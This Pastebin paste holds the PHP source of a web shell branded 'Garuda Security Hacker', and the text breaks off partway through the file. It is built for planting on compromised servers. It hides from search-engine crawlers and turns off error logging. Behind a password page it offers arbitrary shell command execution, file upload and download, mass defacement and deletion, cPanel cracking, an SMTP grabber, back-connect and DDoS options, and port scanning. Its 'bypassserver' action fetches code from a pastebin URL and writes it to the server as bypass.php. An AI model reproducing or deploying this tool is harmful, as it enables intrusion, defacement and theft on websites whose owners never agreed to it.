SHARE
TWEET

Untitled

a guest Jan 20th, 2017 160 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10.  
  11. $color = "#00ff00";
  12. $default_action = 'FilesMan';
  13. $default_use_ajax = true;
  14. $default_charset = 'UTF-8';
  15. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  16.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  17.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  18.         header('HTTP/1.0 404 Not Found');
  19.         exit;
  20.     }
  21. }
  22.  
  23. function login_shell() {
  24. ?>
  25. <html>
  26. <head>
  27. <title>Garuda Security Hacker</title>
  28. <style type="text/css">
  29. html {
  30.      background: url(http://loscardos.ye.vc/files/1.jpg) no-repeat center center fixed;
  31.   -webkit-background-size: cover;
  32.   -moz-background-size: cover;
  33.   -o-background-size: cover;
  34.   background-size: cover;
  35. }
  36. html,body{margin:0;padding:0;height:100%;font:13px Arial;}
  37. #wrapper{min-height:100%;position:relative;}
  38. #header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
  39. #body{padding-bottom:40px;padding-left:10px;}
  40. #footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
  41.    text-align:center;color:#408080;}
  42. header {
  43.     color: green;
  44.     margin: 10px auto;
  45. }
  46. fieldset {
  47.     width: 250px;
  48.     height: 140px;
  49.     background: silver;
  50.     padding:4px 20px;
  51.     margin:0;
  52.     color:cinnamon;
  53.     letter-spacing:2px;
  54.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px aqua;
  55.     text-decoration: none;
  56.  
  57. }
  58. body{cursor: url(http://cur.cursors-4u.net/toons/too-12/too1107.cur), progress !important;}
  59. input[type=password] {
  60.     width: 250px;
  61.     height: 25px;
  62.     color: red;
  63.     background: #000000;
  64.     border: 1px dotted green;
  65.     padding: 5px;
  66.     margin-left: 20px;
  67.     text-align: center;
  68. }
  69. input[type=text] {
  70.     width: 250px;
  71.     height: 25px;
  72.     color: red;
  73.     background: #000000;
  74.     border: 1px dotted green;
  75.     padding: 5px;
  76.     margin-left: 20px;
  77.     text-align: center;
  78. }
  79. </style>
  80. </head>
  81.  
  82. <center>
  83. <font face="monospace"><br>
  84. <a href="https://garudasecurityhacker.blogspot.com" target="blank"><font color="white">Silahkan login Terlebih dahulu.</a>
  85.  
  86. <header>
  87. <pre>
  88.     </pre>
  89. </header>
  90. <br><br><br><br><br><br><br><br>
  91. <fieldset>
  92.             <label for="login">Username</label>
  93.         <form method="post">
  94. <input type="text" name="id" value="Garuda Security Hacker">
  95. </form>
  96. Password
  97. <form method="post">
  98. <input type="password" name="pass"> <br><br>
  99. <input type="submit" value="Login">
  100. </fieldset>
  101. </form>
  102. <style>
  103. </style>
  104. </head>
  105. <body>
  106.  <div id="footer" color=Red size=3><b>Copyright &copy 2017 - Garuda Security Hacker<br></p></div>
  107.  <div id="footer" color=Red size=3><b>All Rights Reserved.</></div>
  108. </font>
  109. </body>
  110. </head>
  111. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
  112. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
  113. <tbody><tr>
  114. <?php
  115. exit;
  116. }
  117. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  118.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  119.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  120.     else
  121.         login_shell();
  122. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  123.     @ob_clean();
  124.     $file = $_GET['file'];
  125.     header('Content-Description: File Transfer');
  126.     header('Content-Type: application/octet-stream');
  127.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  128.     header('Expires: 0');
  129.     header('Cache-Control: must-revalidate');
  130.     header('Pragma: public');
  131.     header('Content-Length: ' . filesize($file));
  132.     readfile($file);
  133.     exit;
  134. }
  135. ?>
  136. <html>
  137. <head>
  138. <title>Garuda Security Hacker</title>
  139. <meta name='author' content='IndoXploit'>
  140. <meta charset="UTF-8">
  141. <style type='text/css'>
  142. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  143. html {
  144.      background: url(http://loscardos.ye.vc/3.jpg) no-repeat center center fixed;
  145.   -webkit-background-size: cover;
  146.   -moz-background-size: cover;
  147.   -o-background-size: cover;
  148.   background-size: cover;
  149.     color: #ffffff;
  150.     font-family: 'Ubuntu';
  151.     font-size: 13px;
  152.     width: 100%;
  153. }
  154. body {
  155.      text-align: center;
  156.     resize: none;
  157.     text-shadow: 2px 4px 10px;
  158. }
  159. select {
  160.     width: 152px;
  161.     background: #000000;
  162.     color: lime;
  163.     border: 1px solid #ffffff;
  164.     margin: 5px auto;
  165.     padding-left: 5px;
  166.     font-family: 'Ubuntu';
  167.     font-size: 13px;
  168. }
  169. .terimakasih {
  170.     border: 1px solid #5cb85c;
  171.     border-radius :4px;
  172.     width: 550px;
  173.       border: 2px solid #00ff00;box-shadow: 0px 0px 15px white;
  174.     height: 100px;
  175. }
  176.  
  177. th {
  178.     padding: 10px;
  179. }
  180. .php
  181. *{
  182.     font-size:12px;
  183.     font-family:Tahoma,Verdana,Arial;
  184. }
  185. textarea {
  186.     border: 1px solid #FFFF00;
  187.     width: 100%;
  188.     height: 400px;
  189.     padding-left: 5px;
  190.     margin: 10px auto;
  191.     resize: none;
  192.     background: transparent;
  193.     color: #FFFF00;
  194.     font-family: 'Ubuntu';
  195.     font-size: 13px;
  196. }
  197. a {
  198.     color: lime;
  199.     text-decoration: none;
  200. }
  201. li {
  202.     display: inline;
  203.     margin: 5px;
  204.     padding: 5px;
  205. }
  206. table, th, td {
  207.     border-collapse:collapse;
  208.     font-family: Tahoma, Geneva, sans-serif;
  209.     background: transparent;
  210.     font-family: 'Ubuntu';
  211.     font-size: 13px;
  212.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px blue;
  213.      
  214. }
  215. a:hover {cursor: url(http://cur.cursors-4u.net/toons/too-12/too1107.cur), progress !important;}
  216. body{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/aliendance.gif"), auto;}
  217. th {
  218.     padding: 10px;
  219. }
  220. a:hover {
  221.     color: gold;
  222.     text-decoration: underline;
  223. }
  224. .table_home, .th_home, .td_home {
  225.     border: 1px solid blue;
  226. }
  227. #menu a{
  228.     padding:4px 20px;
  229.     margin:0;
  230.     background:#222222;
  231.     letter-spacing:2px;
  232.         width: 100%;
  233.     height: 170px;
  234.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px lime;
  235.     color: orange;
  236.     text-decoration: none;
  237. }
  238. #kotak{
  239.     padding:4px 20px;
  240.     margin:0;
  241.     letter-spacing:1px;
  242.     height: 138px;
  243.     color:silver;
  244.      border: 1px solid blue;box-shadow: 0px 0px 15px red;
  245.      text-decoration: none;
  246. }
  247. .td_home{
  248.     padding:4px 20px;
  249.     margin:0;
  250.     color:cinnamon;
  251.     letter-spacing:2px;
  252.      border: 1px solid #00ff00;box-shadow: 0px 0px 15px aqua;
  253.     text-decoration: none;
  254. }
  255. .th_home{
  256.         background:red;
  257.     margin:0;
  258.     color:gold;
  259.     letter-spacing:2px;
  260.     text-decoration: none;
  261. }
  262. </style>
  263. </head>
  264. <?php
  265.  
  266. function w($dir,$perm) {
  267.     if(!is_writable($dir)) {
  268.         return "<font color=red>".$perm."</font>";
  269.     } else {
  270.         return "<font color=lime>".$perm."</font>";
  271.     }
  272. }
  273. function r($dir,$perm) {
  274.     if(!is_readable($dir)) {
  275.         return "<font color=red>".$perm."</font>";
  276.     } else {
  277.         return "<font color=lime>".$perm."</font>";
  278.     }
  279. }
  280. function exe($cmd) {
  281.     if(function_exists('system')) {        
  282.         @ob_start();       
  283.         @system($cmd);     
  284.         $buff = @ob_get_contents();        
  285.         @ob_end_clean();       
  286.         return $buff;  
  287.     } elseif(function_exists('exec')) {        
  288.         @exec($cmd,$results);      
  289.         $buff = "";        
  290.         foreach($results as $result) {         
  291.             $buff .= $result;      
  292.         } return $buff;    
  293.     } elseif(function_exists('passthru')) {        
  294.         @ob_start();       
  295.         @passthru($cmd);       
  296.         $buff = @ob_get_contents();        
  297.         @ob_end_clean();       
  298.         return $buff;  
  299.     } elseif(function_exists('shell_exec')) {      
  300.         $buff = @shell_exec($cmd);     
  301.         return $buff;  
  302.     }
  303. }
  304. function perms($file){
  305.     $perms = fileperms($file);
  306.     if (($perms & 0xC000) == 0xC000) {
  307.     // Socket
  308.     $info = 's';
  309.     } elseif (($perms & 0xA000) == 0xA000) {
  310.     // Symbolic Link
  311.     $info = 'l';
  312.     } elseif (($perms & 0x8000) == 0x8000) {
  313.     // Regular
  314.     $info = '-';
  315.     } elseif (($perms & 0x6000) == 0x6000) {
  316.     // Block special
  317.     $info = 'b';
  318.     } elseif (($perms & 0x4000) == 0x4000) {
  319.     // Directory
  320.     $info = 'd';
  321.     } elseif (($perms & 0x2000) == 0x2000) {
  322.     // Character special
  323.     $info = 'c';
  324.     } elseif (($perms & 0x1000) == 0x1000) {
  325.     // FIFO pipe
  326.     $info = 'p';
  327.     } else {
  328.     // Unknown
  329.     $info = 'u';
  330.     }
  331.         // Owner
  332.     $info .= (($perms & 0x0100) ? 'r' : '-');
  333.     $info .= (($perms & 0x0080) ? 'w' : '-');
  334.     $info .= (($perms & 0x0040) ?
  335.     (($perms & 0x0800) ? 's' : 'x' ) :
  336.     (($perms & 0x0800) ? 'S' : '-'));
  337.     // Group
  338.     $info .= (($perms & 0x0020) ? 'r' : '-');
  339.     $info .= (($perms & 0x0010) ? 'w' : '-');
  340.     $info .= (($perms & 0x0008) ?
  341.     (($perms & 0x0400) ? 's' : 'x' ) :
  342.     (($perms & 0x0400) ? 'S' : '-'));
  343.     // World
  344.     $info .= (($perms & 0x0004) ? 'r' : '-');
  345.     $info .= (($perms & 0x0002) ? 'w' : '-');
  346.     $info .= (($perms & 0x0001) ?
  347.     (($perms & 0x0200) ? 't' : 'x' ) :
  348.     (($perms & 0x0200) ? 'T' : '-'));
  349.     return $info;
  350. }
  351. function hdd($s) {
  352.     if($s >= 1073741824)
  353.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  354.     elseif($s >= 1048576)
  355.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  356.     elseif($s >= 1024)
  357.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  358.     else
  359.     return $s .' B';
  360. }
  361. function ambilKata($param, $kata1, $kata2){
  362.     if(strpos($param, $kata1) === FALSE) return FALSE;
  363.     if(strpos($param, $kata2) === FALSE) return FALSE;
  364.     $start = strpos($param, $kata1) + strlen($kata1);
  365.     $end = strpos($param, $kata2, $start);
  366.     $return = substr($param, $start, $end - $start);
  367.     return $return;
  368. }
  369. function getsource($url) {
  370.     $curl = curl_init($url);
  371.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  372.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  373.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  374.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  375.     $content = curl_exec($curl);
  376.             curl_close($curl);
  377.     return $content;
  378. }
  379. function bing($dork) {
  380.     $npage = 1;
  381.     $npages = 30000;
  382.     $allLinks = array();
  383.     $lll = array();
  384.     while($npage <= $npages) {
  385.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  386.         if($x) {
  387.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  388.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  389.             $npage = $npage + 10;
  390.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  391.         } else break;
  392.     }
  393.     $URLs = array();
  394.     foreach($allLinks as $url){
  395.         $exp = explode("/", $url);
  396.         $URLs[] = $exp[2];
  397.     }
  398.     $array = array_filter($URLs);
  399.     $array = array_unique($array);
  400.     $sss = count(array_unique($array));
  401.     foreach($array as $domain) {
  402.         echo $domain."\n";
  403.     }
  404. }
  405. function reverse($url) {
  406.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  407.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  408.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  409.           curl_setopt($ch, CURLOPT_HEADER, 0);
  410.           curl_setopt($ch, CURLOPT_POST, 1);
  411.     $resp = curl_exec($ch);
  412.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  413.     $array = explode(",,", $resp);
  414.     unset($array[0]);
  415.     foreach($array as $lnk) {
  416.         $lnk = "http://$lnk";
  417.         $lnk = str_replace(",", "", $lnk);
  418.         echo $lnk."\n";
  419.         ob_flush();
  420.         flush();
  421.     }
  422.         curl_close($ch);
  423. }
  424. if(get_magic_quotes_gpc()) {
  425.     function idx_ss($array) {
  426.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  427.     }
  428.     $_POST = idx_ss($_POST);
  429.     $_COOKIE = idx_ss($_COOKIE);
  430. }
  431.  
  432. if(isset($_GET['dir'])) {
  433.     $dir = $_GET['dir'];
  434.     chdir($dir);
  435. } else {
  436.     $dir = getcwd();
  437. }
  438. $kernel = php_uname();
  439. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  440. $dir = str_replace("\\","/",$dir);
  441. $scdir = explode("/", $dir);
  442. $freespace = hdd(disk_free_space("/"));
  443. $total = hdd(disk_total_space("/"));
  444. $used = $total - $freespace;
  445. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
  446. $ds = @ini_get("disable_functions");
  447. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  448. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  449. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  450. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  451. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  452. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  453. if(!function_exists('posix_getegid')) {
  454.     $user = @get_current_user();
  455.     $uid = @getmyuid();
  456.     $gid = @getmygid();
  457.     $group = "?";
  458. } else {
  459.     $uid = @posix_getpwuid(posix_geteuid());
  460.     $gid = @posix_getgrgid(posix_getegid());
  461.     $user = $uid['name'];
  462.     $uid = $uid['uid'];
  463.     $group = $gid['name'];
  464.     $gid = $gid['gid'];
  465. }
  466. echo '<center><div id="kotak">';
  467. echo "System: <font color=lime>".$kernel."</font><br>";
  468. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  469. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  470. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  471. echo "Safe Mode: $sm<br>";
  472. echo "Disable Functions: $show_ds<br>";
  473. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  474. echo "Current DIR: ";
  475. foreach($scdir as $c_dir => $cdir) {   
  476.     echo "<a href='?dir=";
  477.     for($i = 0; $i <= $c_dir; $i++) {
  478.         echo $scdir[$i];
  479.         if($i != $c_dir) {
  480.         echo "/";
  481.         }
  482.     }
  483.     echo "'>$cdir</a>/";
  484. }
  485. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  486. echo '<center><div id="menu">';
  487. echo "<ul><br>";
  488. echo "<a href='?'>Home</a>";
  489. echo "<a href='?dir=$dir&do=upload'>Upload</a>";
  490. echo "<a href='?dir=$dir&do=cmd'>Command</a>";
  491. echo "<a href='?dir=$dir&do=mass_deface'>Mass Deface</a>";
  492. echo "<a href='?dir=$dir&do=mass_delete'>Mass Delete</a>";
  493. echo "<a href='?dir=$dir&do=config'>Config</a>";
  494. echo "<a href='?dir=$dir&do=jumping'>Jumping</a>";
  495. echo "<a href='?dir=$dir&do=cpanel'>CPanel Crack</a>";
  496. echo "<a href='?dir=$dir&do=smtp'>SMTP Grabber</a>";
  497. echo "<a href='?dir=$dir&do=cgi'>CGI Telnet</a> ";
  498. echo "<br><br><a href='?dir=$dir&do=fake_root'>Fake Root</a>";
  499. echo "<a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a>";
  500. echo "<a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a>";
  501. echo "<a href='?dir=$dir&do=auto_wp'>Auto Edit Title</a>";
  502. echo "<a href='?dir=$dir&do=zoneh'>Zone-H</a>";
  503. echo "<a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a>";
  504. echo "<a href='?dir=$dir&do=cpftp_auto'>CFTP Auto Deface</a>";
  505. echo "<br><br><a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a>";
  506. echo "<a href='?dir=$dir&do=network'>network</a>";
  507. echo "<a href='?dir=$dir&do=about'>about</a>";
  508. echo "<a href='?dir=$dir&do=adminer'>Adminer</a>";
  509. echo "<a href='?dir=$dir&do=tool'>Tool</a>";
  510. echo "<a href='?dir=$dir&do=admf'>Admin Finder</a>";
  511. echo "<a href='?dir=$dir&do=symlink'>symlink</a>";
  512. echo "<a href='?dir=$dir&do=autoklik'>Auto Deface</a>";
  513. echo "<br><br><a href='?dir=$dir&do=whois'>Whois</a>";
  514. echo "<a href='?dir=$dir&do=csrf'>CSRF Online</a>";
  515. echo "<a href='?dir=$dir&do=ende'>Encode Decode</a>";
  516. echo "<a href='?dir=$dir&do=ddos'>DDos</a>";
  517. echo "<a href='?dir=$dir&do=shellscanner'>Shell Scanner</a>";
  518. echo "<a href='?dir=$dir&do=ende'>Encode Decode</a><br><br>";
  519. echo "<a href='?xp=bypassserver'>Full bypass</a>";
  520. echo "<a href='?dir=$dir&do=defacerid'>DefacerID</a>";
  521. echo "<a href='?dir=$dir&do=bconnet'>Back Connect</a>";
  522. echo "<a style='color: red;' href='?logout=true'>Logout</a>";
  523. echo "</ul>";
  524. echo "</div>";
  525. if($_GET['logout'] == true) {
  526.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  527.     echo "<script>window.location='?';</script>";
  528. } elseif($_GET['do'] == 'upload') {
  529.     echo "<center>";
  530.     if($_POST['upload']) {
  531.         if($_POST['tipe_upload'] == 'biasa') {
  532.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  533.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  534.             } else {
  535.                 $act = "<font color=red>failed to upload file</font>";
  536.             }
  537.         } else {
  538.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  539.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  540.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  541.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  542.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  543.                 } else {
  544.                     $act = "<font color=red>failed to upload file</font>";
  545.                 }
  546.             } else {
  547.                 $act = "<font color=red>failed to upload file</font>";
  548.             }
  549.         }
  550.     }
  551.     echo "Upload File:
  552.     <form method='post' enctype='multipart/form-data'>
  553.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  554.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  555.     <input type='file' name='ix_file'>
  556.     <input type='submit' value='upload' name='upload'>
  557.     </form>";
  558.     echo $act;
  559.     echo "</center>";
  560. }
  561. function parah($pastebin, $nama_file){
  562.     $usa = file_get_contents("$pastebin");
  563.     $frr = fopen("$nama_file", 'w');
  564.     fwrite($frr, $usa);
  565. }
  566. $xp = @$_GET['xp'];
  567. if($xp == "bypassserver"){
  568.             $config = parah("http://pastebin.com/raw/3g9HchNP", "bypass.php");
  569.        echo '<center><font color =red><a href="bypass.php" target="_blank">Clik Here To Switch Bypass</a><br></font></center>';
  570. } elseif($_GET['do'] == 'whois') {
  571. @set_time_limit(0);
  572.    @error_reporting(0);
  573.    function sws_domain_info($site)
  574.    {
  575.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  576.    flush();
  577.    $ip = @findit($getip,'<pre>','</pre>');
  578.    return $ip;
  579.    flush();
  580.    }
  581.    function sws_net_info($site)
  582.    {
  583.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  584.    $ip = @findit($getip,'<pre>','</pre>');
  585.    return $ip;
  586.    flush();
  587.    }
  588.    function sws_site_ser($site)
  589.    {
  590.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  591.    $ip = @findit($getip,'<pre>','</pre>');
  592.    return $ip;
  593.    flush();
  594.    }
  595.    function sws_sup_dom($site)
  596.    {
  597.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  598.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  599.    return $ip;
  600.    flush();
  601.    }
  602.    function sws_port_scan($ip)
  603.    {
  604.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  605.    foreach ($list_post as $o_port)
  606.    {
  607.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  608.    if($connect)
  609.    {
  610.    echo ' $ip : $o_port ??? <u style="color: blue">Open</u> <br /><br />';
  611.    flush();
  612.    }
  613.    }
  614.    }
  615.    function findit($mytext,$starttag,$endtag) {
  616.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  617.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  618.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  619.    flush();
  620.    }
  621.    echo '<br><br><center>';
  622.    echo '
  623.     <br />
  624.     <div class="sc"><form method="post"><table>
  625.     <tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
  626.     <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:white;" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan !" /></td></tr>
  627.     </table></form></div>';
  628.    if(isset($_POST['scan']))
  629.    {
  630.    $site = @htmlentities($_POST['site']);
  631.    if (empty($site)){die('<br /><br /> Not add IP .. !');}
  632.    $ip_port = @gethostbyname($site);
  633.    echo "
  634.    <br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
  635.    <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
  636.    <div class='ru'> <br /><br /><pre>
  637.    ";
  638.    echo "".sws_port_scan($ip_port)." </pre></div> ";
  639.    flush();
  640.    echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  641.    <div class="ru">
  642.    <pre>".sws_domain_info($site)."</pre></div>';
  643.    flush();
  644.    echo '
  645.    <div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  646.    <div class="ru">
  647.    <pre>".sws_net_info($site)."</pre> </div>';
  648.    flush();
  649.    echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  650.    <div class="ru">
  651.    <pre>".sws_sup_dom($site)."</pre> </div>';
  652.    flush();
  653.    echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  654.    <div class="ru">
  655.    <pre>".sws_site_ser($site)."</pre> </div>
  656.    <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
  657.    flush();
  658.    }
  659.     echo '</center>';
  660.  
  661. } elseif($_GET['do'] == 'whois') {
  662. ?>
  663. <body >
  664. <center>
  665. <br>
  666. <form method="post"><br>
  667. <textarea class='inputz' cols=30 rows=5 name="mbutt" style="background:transparent;color:aqua;"></textarea><br><br>
  668. <select class='inputz' size="1" name="ope" style="background:red;color:aqua;">
  669. <option style='background:transparent;color:aqua;'><center>[#] Encryption [#]</option>
  670. <option value="urlencode" style='background:transparent;color:aqua;'>url</option>
  671. <option value="base64" style='background:transparent;color:aqua;'>Base64</option>
  672. <option value="ur" style='background:transparent;color:aqua;'>convert_uu</option>
  673. <option value="json" style='background:transparent;color:aqua;'>json</option>
  674. <option value="gzinflates" style='background:transparent;color:aqua;'>gzinflate - base64</option>
  675. <option value="str2" style='background:transparent;color:aqua;'>str_rot13 - base64</option>
  676. <option value="gzinflate" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - base64</option>
  677. <option value="gzinflater" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - base64</option>
  678. <option value="gzinflatex" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - gzinflate - base64</option>
  679. <option value="gzinflatew" style='background:transparent;color:aqua;'>str_rot13 - convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url - str_rot13 - gzinflate - base64</option>
  680. <option value="str" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - str_rot13 - base64</option>
  681. <option value="url" style='background:transparent;color:aqua;'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  682. <option value="hexencode" style='background:transparent;color:aqua;'>Hex Encode/Decode</option>
  683. <option value="md5" style='background:transparent;color:aqua;'><center>MD5 Hash</option>
  684. <option value="sha1" style='background:transparent;color:aqua;'>SHA1 Hash</option>
  685. <option value="str_rot13" style='background:transparent;color:aqua;'>ROT13 Hash</option>
  686. <option value="strlen" style='background:transparent;color:aqua;'>strlen</option>
  687. <option value="xxx" style='background:transparent;color:aqua;'>unescape</option>
  688. <option value="bbb" style='background:transparent;color:aqua;'>charAt</option>
  689. <option value="aaa" style='background:transparent;color:aqua;'>chr - bin2hex - substr</option>
  690. <option value="www" style='background:transparent;color:aqua;'>chr</option>
  691. <option value="sss" style='background:transparent;color:aqua;'>htmlspecialchars</option>
  692. <option value="eee" style='background:transparent;color:aqua;'>escape</option></select><br><input class='inputzbut' type='submit' name='submit' value='Encode' style="background:transparent;color:aqua;">
  693. <input class='inputzbut' type='submit' name='crack' value='Decode' style="background:transparent;color:aqua;"><br>
  694. </select>&nbsp;
  695. </form>
  696. <?php
  697. $submit = $_POST['submit'];
  698. if (isset($submit)){
  699. $op = $_POST["ope"];
  700. switch ($op) {case 'base64': $codi=base64_encode($text);
  701. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  702. break;case 'json' : $codi=json_encode(utf8_encode($text));
  703. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  704. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  705. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  706. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  707. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  708. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  709. break;case 'urlencode' : $codi=rawurlencode($text);
  710. break;case 'hexencode' : $codi=bin2hex($text);
  711. break;case 'md5' : $codi=md5($text);
  712. break;case 'ur' : $codi=convert_uuencode($text);
  713. break;case 'str_rot13' : $codi=str_rot13($text);
  714. break;case 'sha1' : $codi=sha1($text);
  715. break;case 'strlen' : $codi=strlen($text);
  716. break;case 'xxx' : $codi=strlen(bin2hex($text));
  717. break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
  718. break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
  719. break;case 'www' : $codi=chr($text);
  720. break;case 'sss' : $codi=htmlspecialchars($text);
  721. break;case 'eee' : $codi=addslashes($text);
  722. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  723. break;default:break;}}
  724.  
  725. $submit = $_POST['crack'];
  726. if (isset($submit)){
  727. $op = $_POST["ope"];
  728. switch ($op) {case 'base64': $codi=base64_decode($text);
  729. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  730. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  731. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  732. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  733. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
